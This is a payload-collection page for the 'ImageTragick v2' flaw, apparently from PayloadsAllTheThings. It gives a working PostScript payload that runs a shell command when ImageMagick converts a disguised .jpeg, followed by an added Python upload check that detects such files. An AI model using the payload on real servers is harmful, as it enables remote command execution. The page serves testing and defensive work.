PayloadsAllTheThings/Upload insecure files/Image Tragik 2
2018-08-22 21:42:25 +02:00
centos_id.jpeg ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
README.md ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
ubuntu_id.jpeg ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00
ubuntu_shell.jpeg ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 21:42:25 +02:00

Image Tragik 2

Exploit

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

Then process the file with ImageMagick: convert shellexec.jpeg whatever.gif
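A defensive check for the upload path, added here as an example (not part of the original repository): the sample files listed above carry a .jpeg extension but contain PostScript, so the check compares the file's magic bytes with its extension and looks for the PostScript tokens the payload uses. The function name, the allow-list and the sample bytes are assumptions constructed for illustration.

```python
# Magic bytes for the image types an upload endpoint accepts (assumed allow-list).
IMAGE_MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# PostScript tokens that appear in the payload shown on this page.
PS_TOKENS = (b"%pipe%", b"putdeviceprops", b"setpagedevice", b"/OutputFile")

# Constructed samples: a PostScript file named like an image, and a JPEG header.
SAMPLE_PS = (b"%!PS\nuserdict /setpagedevice undef\n"
             b"mark /OutputFile (%pipe%true) currentdevice putdeviceprops\n")
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32


def inspect_upload(filename, data):
    """Return a list of findings; an empty list means the file passed."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    magics = IMAGE_MAGIC.get(ext)
    if magics is None:
        findings.append("extension-not-allowed")
    elif not data.startswith(magics):
        findings.append("magic-mismatch")
    # ImageMagick selects the decoder from file content, not the extension,
    # so a .jpeg that starts with %! is handed to the PostScript delegate.
    head = data[:1024].lstrip(b"\xef\xbb\xbf \t\r\n")
    if head.startswith(b"%!") or data.startswith(b"\xc5\xd0\xd3\xc6"):
        findings.append("postscript-header")
    for tok in PS_TOKENS:
        if tok in data:
            findings.append("ps-token:" + tok.decode())
    return findings


if __name__ == "__main__":
    print(inspect_upload("ubuntu_id.jpeg", SAMPLE_PS))
    print(inspect_upload("photo.jpeg", SAMPLE_JPEG))
```

Content checks like this complement, rather than replace, disabling the PS, EPS, PDF and XPS coders in ImageMagick's policy.xml.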

Thanks to